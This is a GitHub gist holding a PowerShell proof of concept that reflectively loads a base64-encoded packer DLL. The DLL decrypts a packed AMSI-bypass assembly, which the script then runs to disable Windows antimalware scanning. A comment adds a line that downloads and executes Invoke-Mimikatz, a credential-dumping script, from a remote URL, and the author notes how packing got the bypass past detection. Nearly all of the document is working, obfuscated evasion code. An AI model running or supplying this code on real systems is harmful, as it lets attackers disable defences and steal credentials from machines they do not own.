Last active
June 3, 2020 20:39
-
-
Save TheWover/dc1217a76d1db47cdabbe6977f7f11c5 to your computer and use it in GitHub Desktop.
Runs AMSIBypass2 to disable AMSI. Loads my packer DLL from b64, uses Reflection to call its Unpack function on packed AMSIBypass2.exe, then loads the result using Assembly.Load again. Powershell PoC of https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $payload = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAP7dKbEAAAAAAAAAAOAAIiALATAAAA4AAAAGAAAAAAAA2i0AAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAIctAABPAAAAAEAAAKgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADILAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA4A0AAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgDAAAAQAAAAAQAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAC7LQAAAAAAAEgAAAACAAUAVCMAAHQJAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswBADaAAAAAQAAEQJzDwAACgpzEAAACgsHF3MRAAAKDAYIbxIAAAoIbxMAAApzFAAACg0JCW8VAAAKCW8WAAAKbxcAAAoTBHMQAAAKEwURBREEF3MYAAAKEwYRBgdvGQAAChYHbxkAAAqOaW8aAAAKEQZvGwAAChEFbxkAAAooHAAACglvFQAACigcAAAKCW8WAAAKKBwAAApzAwAABhMH3kARBiwHEQZvHQAACtwRBSwHEQVvHQAACtwJLAYJbx0AAArcCCwGCG8dAAAK3AcsBgdvHQAACtwGLAYGbx0AAArcEQcqAAABTAAAAgBPAEiXAAwAAAAAAgBDAGCjAAwAAAAAAgAoAIevAAoAAAAAAgAVAKS5AAoAAAAAAgANALbDAAoAAAAAAgAHAMbNAAoAAAAAGzADAFQBAAACAAARAnsBAAAELA4CewEAAARvHgAAChYwC3IBAABwcx8AAAp6AnsCAAAELA4CewIAAARvHgAAChYwC3IVAABwcx8AAAp6AnsDAAAELA4CewMAAARvHgAAChYwC3IdAABwcx8AAAp6cxQAAAoKBgJ7AgAABCggAAAKbyEAAAoGAnsDAAAEKCAAAApvIgAACgYGbxUAAAoGbxYAAApvIwAACgsCewEAAAQoIAAACnMPAAAKDAgHFnMYAAAKDXMQAAAKEwQJEQRvEgAAChEEbxkAAApzDwAAChMFcxAAAAoTBhEFFmpvJAAAChEFFnMRAAAKEwcRBxEGbxIAAAoRBm8ZAAAKEwjeThEHLAcRB28dAAAK3BEGLAcRBm8dAAAK3BEFLAcRBW8dAAAK3BEELAcRBG8dAAAK3AksBglvHQAACtwILAYIbx0AAArcBiwGBm8dAAAK3BEIKgFYAAACAO8AFAMBDAAAAAACANwAMw8BDAAAAAACANUARhsBDAAAAAACAL8AaCcBDAAAAAACALgAezMBCgAAAAACAK8Ajj0BCgAAAAACAGkA3kcBCgAAAABaAgN9AQAABAIEfQIAAAQCBX0DAAAEKgBCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAAMAwAAI34AAHgDAAA0BAAAI1N0cmluZ3MAAAAArAcAACQAAAAjVVMA0AcAABAAAAAjR1VJRAAAAOAHAACUAQAAI0Jsb2IAAAAAAAAAAgAAAVcVAgAJAAAAAPoBMwAWAAABAAAAHgAAAAMAAAADAAAAAwAAAAUAAAAkAAAADgAAAAIAAAABAAAAAwAAAAAAcQIBAAAAAAAGAIUBjAMGAPIBjAMGALkAWgMPAKwDAAAGAOEA6gIGAGgB6gIGAEkB6gIGANkB6gIGAKUB6gIGAL4B6gIGAPgA6gIGAM0AbQMGAKsAbQMGACwB6gIGABMBEAIGAMEDqQIGAJwCCgAKAJEC1AIOAEIABgQGAMMCBgQGAIQCBgQGAIEAqQIGAKICCgAKAGUA1AIGALACBgQGAFQABgQGANYDqQIGAHUAqQIGAEMCqQIGAAkDqQIAAAAAAQAAAAAAAQABAIEBEAAmAyMEQQABAAEACQEQAMgDIwRZAAEAAwAGAD0AlAAGAAIElAAGAN4DlABQIAAAAACWAFUClwABAIQhAAAAAJYAWgKeAAIAPCMAAAAAhhg0A6UAAwAAAAEAuwMAAAEATQAAAAEAMwAAAAIA+QMAAAMAIgAJADQDAQARADQDBgAZADQDCgApADQDEAAxADQDEAA5ADQDEABBADQDEABJADQDEABRADQDEABZADQDEABhADQDFQBpADQDEABxADQDEAB5ADQDEACJADQDLQCJADQDBgCRADQDMwC5AB8DOwC5AJcABgCZADQDBgDJAOkDQQDJABQAQQDJAEoDRgCpADQDTwCJAOEDQQC5AKUAWQCpAGECBgDZADsCYQDhAJ0ABgDpAEoCfADxADQDEADZACoCgADJAPEDLQDJABsALQDJADoDRgC5APwChgAuAAsArAAuABMAtQAuABsA1AAuACMA3QAuACsA8QAuADMA8QAuADsA8QAuAEMA3QAuAEsA9wAuAFMA8QAuAFsA8QAuAGMADwEuAGsAOQEuAHMARgEaAGcABIAAAAEAAAAAAAAAAAAAAAAAIwQAAAQAAAAAAAAAAAAAAIsAKgAAAAAABAAAAAAAAAAAAAAAiwCpAgAAAAAEAAAAAAAAAAAAAACLAIsAAAAAAAAAAAAAPE1vZHVsZT4AU3lzdGVtLklPAGdldF9JVgBzZXRfSVYAaW5wdXRJVgBtc2NvcmxpYgBpbnB1dEJsb2IAYmxvYgBBZXNNYW5hZ2VkAHBhY2tlZABDcnlwdG9TdHJlYW1Nb2RlAENvbXByZXNzaW9uTW9kZQBJRGlzcG9zYWJsZQBWYWx1ZVR5cGUAU3lzdGVtLkNvcmUAQ2xvc2UARGlzcG9zZQBXcml0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcAVG9CYXNlNjRTdHJpbmcAZ2V0X0xlbmd0aABQYWNrAFVucGFjawBGbHVzaEZpbmFsQmxvY2sARWFzeU5ldExpYnJhcnkuZGxsAENyeXB0b1N0cmVhbQBHWmlwU3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAElDcnlwdG9UcmFuc2Zvcm0AU3lzdGVtLklPLkNvbXByZXNzaW9uAFN5c3RlbS5SZWZsZWN0aW9uAHNldF9Qb3NpdGlvbgBBcmd1bWVudE51bGxFeGNlcHRpb24AQ29weVRvAEVhc3lOZXRQYWNrZXIALmN0b3IAQ3JlYXRlRGVjcnlwdG9yAENyZWF0ZUVuY3J5cHRvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAYnl0ZXMAT2JqZWN0AEVhc3lOZXRSZXN1bHQAQ29udmVydABpdgBUb0FycmF5AGdldF9LZXkAc2V0X0tleQBpbnB1dEtleQBrZXkAU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeQBFYXN5TmV0TGlicmFyeQAAAAATcABsAGEAaQBuAFQAZQB4AHQAAAdLAGUAeQAABUkAVgAAABGM/ekggCVFjnLp4NyguRUABCABAQgDIAABBSABARERBCABAQ4EIAEBAhIHCBJFEkUSSRJNElESRRJVEQwFIAEBHQUHIAIBEl0RYQUgAQESXQQgAB0FCCACElEdBR0FCSADARJdElERaQcgAwEdBQgIBQABDh0FFAcJEk0SURJFElUSRRJFEkUSSR0FAyAACAUAAR0FDgQgAQEKCLd6XFYZNOCJAgYOBgABEQwdBQYAAR0FEQwGIAMBDg4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAA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"; | |
| $easynet = [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($payload)); | |
| $bypass = [System.Reflection.Assembly]::Load($easynet.GetTypes()[0].GetMethod("Unpack").Invoke($null, @($easynet.GetTypes()[1]::new("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", "WWJF8SqyouvSGzEVA0j+Aw==")))); | |
| $bypass.GetTypes()[0].GetMethods()[1].Invoke($null, $null); |
Test AMSI with the following string. Doesn't work, but it will fail to run if AMSI is enabled:
iex (new-object net.webclient).downloadstring("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1")
Full C# program is at: https://gist.github.com/TheWover/b5e0642b068138544b024dcfcf4a9d3b
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Had to do this because even using the string of b64 encoded AMSIBypass2.exe triggered AMSI. Interestingly, though, the raw, unpacked version does not triggered when provided to Assembly.Load after unpacking. Means they are not checking at invocation of Load.